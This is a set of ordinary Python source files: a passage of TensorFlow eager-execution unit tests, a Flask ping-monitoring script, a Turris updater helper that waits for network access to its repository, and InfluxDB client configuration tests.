self.assertEqual(y.device, current_device())
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegex(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
cpu.__exit__()
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
with ops.device('CPU:0'):
test_var = variables.Variable([2., 3.])
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
self.assertAllEqual(test_fn(test_var), 1.0)
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tfe.TFE_Py_RegisterExceptionClass(str)
pywrap_tfe.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
# TODO(b/149995282): When an exception is thrown in ASYNC mode, it seems
# there are things left over that cause mutex corruption when
# _reset_context() is called before the next test is executed.
#
# context.set_execution_mode(context.ASYNC)
# with self.assertRaises(errors.InvalidArgumentError):
# execute(
# b'MatMul',
# num_outputs=1,
# inputs=[three, five],
# attrs=('transpose_a', False, 'transpose_b', False, 'T',
# three.dtype.as_datatype_enum))
# context.context().executor.wait()
#
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Expecting a Dimension for attr shape, got object'):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [object()], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
    # x: Run the "TruncatedNormal" op on CPU and copy the result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
def testEmptyResourceReturned(self):
with ops.device('CPU:0'):
v = variables.Variable(1.)
empty_handle = array_ops.gather(
v.handle[array_ops.newaxis], array_ops.zeros([0], dtype=dtypes.int32))
self.assertEqual(
[0],
empty_handle.shape.as_list())
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
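  # A reading of the attrs used below (not an authoritative description of the _Send/_Recv ops):
  # transfers are paired by tensor_name together with the sending device and its incarnation, and
  # client_terminated marks transfers driven directly by this client.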
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = array_ops.identity(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
run.py
|
import os
import time
import logging
import threading
from functools import wraps
import sqlalchemy as sa
import ping
from db import init_db
from app import create_app
DB_URL = os.environ.get("DB_URL")
ENVIRONMENT = os.environ.get("FLASK_ENV", "development")
PING_HOSTS = os.environ.get("PING_HOSTS", "google.com")
PING_DELAY_SEC = int(os.environ.get("PING_DELAY_SEC", 60))
PING_FAIL_DELAY_SEC = PING_DELAY_SEC // 10 or 1
DEBUG = ENVIRONMENT == "development"
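# Example invocation (hypothetical values, not taken from this project's docs):
#   DB_URL=sqlite:///ping.db PING_HOSTS=google.com,8.8.8.8 PING_DELAY_SEC=30 python run.py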
logging.basicConfig(
level=logging.DEBUG if DEBUG else logging.INFO,
format="%(asctime)s [%(levelname)-8s] %(lineno)-4s <%(funcName)s> - %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
logger = logging.getLogger(__name__)
logger.info("Starting ping %s in %s environment", PING_HOSTS, ENVIRONMENT)
logger.debug(
"PING_DELAY_SEC=%r, PING_FAIL_DELAY_SEC=%r", PING_DELAY_SEC, PING_FAIL_DELAY_SEC
)
assert DB_URL, "DB_URL environment variable is not set"
assert PING_HOSTS, "PING_HOSTS is empty"
engine = sa.create_engine(DB_URL)
db = init_db(engine)
def run_as_thread(fn):
"""Run function as thread"""
@wraps(fn)
def run(*args, **kwargs):
t = threading.Thread(target=fn, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
return run
def log_res(res):
"""Save ping res to db
Args:
res (ping.PingResult): Ping result instance
"""
with db.session():
db.Ping.create(res.host, res.time_ms, int(time.time()))
@run_as_thread
def ping_tester(host, delay=60, delay_fail=6):
"""Ping testing thread
Args:
host (str): Ping hostname or IP
delay (int, optional): Delay between ping requests
        delay_fail (int, optional): Delay between ping requests when the previous ping fails
"""
while True:
res = ping.ping(host)
if not res.ok:
logger.warning("Ping failed: %s", res)
sub_res = ping.ping(host) # Double check ping if it fails
while not sub_res.ok:
log_res(sub_res)
sub_res = ping.ping(host)
time.sleep(delay_fail)
log_res(sub_res)
else:
log_res(res)
time.sleep(delay)
if __name__ == "__main__":
    for host in {h.strip() for h in PING_HOSTS.split(",") if h.strip()}:
logger.info("Run ping tester for %s", host)
ping_tester(host, delay=PING_DELAY_SEC, delay_fail=PING_FAIL_DELAY_SEC)
app = create_app()
app.run(host="0.0.0.0")
|
prerun.py
|
"""These are functions we use before we even take pid lock file.
They allow updater-supervisor to be suspended for random amount of time or it allows it to wait for internet connection.
"""
import time
import random
import typing
import subprocess
import multiprocessing
from . import const, utils
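# Typical call order, sketched from these definitions rather than from the callers:
#   random_sleep(min_s, max_s)   # spread start-up over a time window
#   wait_for_network(max_stall)  # then block until repo.turris.cz answers "ok" (or give up)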
def random_sleep(min_seconds: int, max_seconds: int):
"""Sleep random amount of seconds with given range (min and max amount of seconds)."""
if max_seconds is None or max_seconds <= 0 or max_seconds < min_seconds:
return # No sleep at all
    suspend = random.randint(min_seconds, max_seconds)
if suspend > 0: # Just nice to have no print if we wait for 0 seconds
utils.report("Suspending updater start for " + str(suspend) + " seconds")
time.sleep(suspend)
def turris_repo_health(address: str = const.TURRIS_REPO_HEALTH_URL) -> bool:
"""Try to receive provided address and checks if result is "ok".
Returns True on success and False if download in any way fails.
"""
res = subprocess.run(['curl', address], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, text=True, check=False)
return res.returncode == 0 and res.stdout == "ok\n"
def wait_for_network(max_stall: int) -> bool:
"""Wait for ability to access the repo.turris.cz.
The max_stall can be any number of seconds but too small numbers (few seconds) should not be used as it might not be
enough time to actually perform even a single network connection test. For zero and negative numbers this function
behaves the same way as call to the turris_repo_health.
Returns True if connection is successful and False if wait timed out.
"""
def network_test():
"""Run network test (expected to be run as subprocess)."""
if not turris_repo_health():
utils.report("Waiting for network connection")
delay = 2
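            # Exponential backoff: re-test roughly every 2, 4, 8, ... seconds until the repo answers.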
while True:
now = time.time()
if turris_repo_health():
return
                sleep_time = delay - (time.time() - now)
if sleep_time > 0:
time.sleep(sleep_time)
delay *= 2
if max_stall <= 0:
return turris_repo_health()
process = multiprocessing.Process(target=network_test)
process.start()
process.join(max_stall)
if process.is_alive():
process.terminate()
return False
return True
|
test_InfluxDBClient.py
|
import http.server
import json
import os
import threading
import unittest
from influxdb_client import InfluxDBClient, Point
from influxdb_client.client.write_api import SYNCHRONOUS, ASYNCHRONOUS, WriteOptions, WriteType
class InfluxDBClientTest(unittest.TestCase):
def tearDown(self) -> None:
if self.client:
self.client.close()
if hasattr(self, 'httpd'):
self.httpd.shutdown()
if hasattr(self, 'httpd_thread'):
self.httpd_thread.join()
def test_default_conf(self):
self.client = InfluxDBClient(url="http://localhost:8086", token="my-token", org="my-org")
self.assertIsNotNone(self.client.api_client.configuration.connection_pool_maxsize)
def test_TrailingSlashInUrl(self):
self.client = InfluxDBClient(url="http://localhost:8086", token="my-token", org="my-org")
self.assertEqual('http://localhost:8086', self.client.api_client.configuration.host)
self.client = InfluxDBClient(url="http://localhost:8086/", token="my-token", org="my-org")
self.assertEqual('http://localhost:8086', self.client.api_client.configuration.host)
def test_ConnectToSelfSignedServer(self):
self._start_http_server()
self.client = InfluxDBClient(f"https://localhost:{self.httpd.server_address[1]}",
token="my-token", verify_ssl=False)
health = self.client.health()
self.assertEqual(health.message, 'ready for queries and writes')
self.assertEqual(health.status, "pass")
self.assertEqual(health.name, "influxdb")
def test_certificate_file(self):
self._start_http_server()
self.client = InfluxDBClient(f"https://localhost:{self.httpd.server_address[1]}",
token="my-token", verify_ssl=True,
ssl_ca_cert=f'{os.path.dirname(__file__)}/server.pem')
health = self.client.health()
self.assertEqual(health.message, 'ready for queries and writes')
self.assertEqual(health.status, "pass")
self.assertEqual(health.name, "influxdb")
def test_init_from_ini_file(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config.ini')
self.assertConfig()
def test_init_from_toml_file(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config.toml')
self.assertConfig()
def assertConfig(self):
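        # A sketch of what config.ini / config.toml presumably contain, inferred from the
        # assertions below rather than copied from the files: url, org and token as asserted,
        # timeout = 6000, connection_pool_maxsize = 55, auth_basic disabled, and three default
        # tags (id, customer, data_center, the last referencing ${env.data_center}).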
self.assertEqual("http://localhost:8086", self.client.url)
self.assertEqual("my-org", self.client.org)
self.assertEqual("my-token", self.client.token)
self.assertEqual(6000, self.client.api_client.configuration.timeout)
self.assertEqual(3, len(self.client.default_tags))
self.assertEqual("132-987-655", self.client.default_tags["id"])
self.assertEqual("California Miner", self.client.default_tags["customer"])
self.assertEqual("${env.data_center}", self.client.default_tags["data_center"])
self.assertEqual(55, self.client.api_client.configuration.connection_pool_maxsize)
self.assertEqual(False, self.client.api_client.configuration.auth_basic)
def test_init_from_file_ssl_default(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config.ini')
self.assertTrue(self.client.api_client.configuration.verify_ssl)
def test_init_from_file_ssl(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config-disabled-ssl.ini')
self.assertFalse(self.client.api_client.configuration.verify_ssl)
def test_init_from_env_ssl_default(self):
if os.getenv("INFLUXDB_V2_VERIFY_SSL"):
del os.environ["INFLUXDB_V2_VERIFY_SSL"]
self.client = InfluxDBClient.from_env_properties()
self.assertTrue(self.client.api_client.configuration.verify_ssl)
def test_init_from_env_ssl(self):
os.environ["INFLUXDB_V2_SSL_CA_CERT"] = "/my/custom/path"
self.client = InfluxDBClient.from_env_properties()
self.assertEqual("/my/custom/path", self.client.api_client.configuration.ssl_ca_cert)
def test_init_from_file_ssl_ca_cert_default(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config.ini')
self.assertIsNone(self.client.api_client.configuration.ssl_ca_cert)
def test_init_from_file_ssl_ca_cert(self):
self.client = InfluxDBClient.from_config_file(f'{os.path.dirname(__file__)}/config-ssl-ca-cert.ini')
self.assertEqual("/path/to/my/cert", self.client.api_client.configuration.ssl_ca_cert)
def test_init_from_env_ssl_ca_cert_default(self):
if os.getenv("INFLUXDB_V2_SSL_CA_CERT"):
del os.environ["INFLUXDB_V2_SSL_CA_CERT"]
self.client = InfluxDBClient.from_env_properties()
self.assertIsNone(self.client.api_client.configuration.ssl_ca_cert)
def test_init_from_env_ssl_ca_cert(self):
os.environ["INFLUXDB_V2_SSL_CA_CERT"] = "/my/custom/path/to/cert"
self.client = InfluxDBClient.from_env_properties()
self.assertEqual("/my/custom/path/to/cert", self.client.api_client.configuration.ssl_ca_cert)
def test_init_from_env_connection_pool_maxsize(self):
os.environ["INFLUXDB_V2_CONNECTION_POOL_MAXSIZE"] = "29"
self.client = InfluxDBClient.from_env_properties()
self.assertEqual(29, self.client.api_client.configuration.connection_pool_maxsize)
def _start_http_server(self):
import http.server
import ssl
        # Silence urllib3's "unverified HTTPS request" warnings
import urllib3
urllib3.disable_warnings()
# Configure HTTP server
self.httpd = http.server.HTTPServer(('localhost', 0), ServerWithSelfSingedSSL)
        # ssl.wrap_socket() was removed in Python 3.12; build an explicit server-side context instead.
        ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        ssl_context.load_cert_chain(certfile=f'{os.path.dirname(__file__)}/server.pem')
        self.httpd.socket = ssl_context.wrap_socket(self.httpd.socket, server_side=True)
# Start server at background
self.httpd_thread = threading.Thread(target=self.httpd.serve_forever)
self.httpd_thread.start()
def test_write_context_manager(self):
        with InfluxDBClient.from_env_properties() as self.client:
api_client = self.client.api_client
with self.client.write_api(write_options=WriteOptions(write_type=WriteType.batching)) as write_api:
write_api_test = write_api
write_api.write(bucket="my-bucket",
record=Point("h2o_feet")
.tag("location", "coyote_creek")
.field("level water_level", 5.0))
self.assertIsNotNone(write_api._subject)
self.assertIsNotNone(write_api._disposable)
self.assertIsNone(write_api_test._subject)
self.assertIsNone(write_api_test._disposable)
self.assertIsNotNone(self.client.api_client)
self.assertIsNotNone(self.client.api_client.rest_client.pool_manager)
self.assertIsNone(api_client._pool)
self.assertIsNone(self.client.api_client)
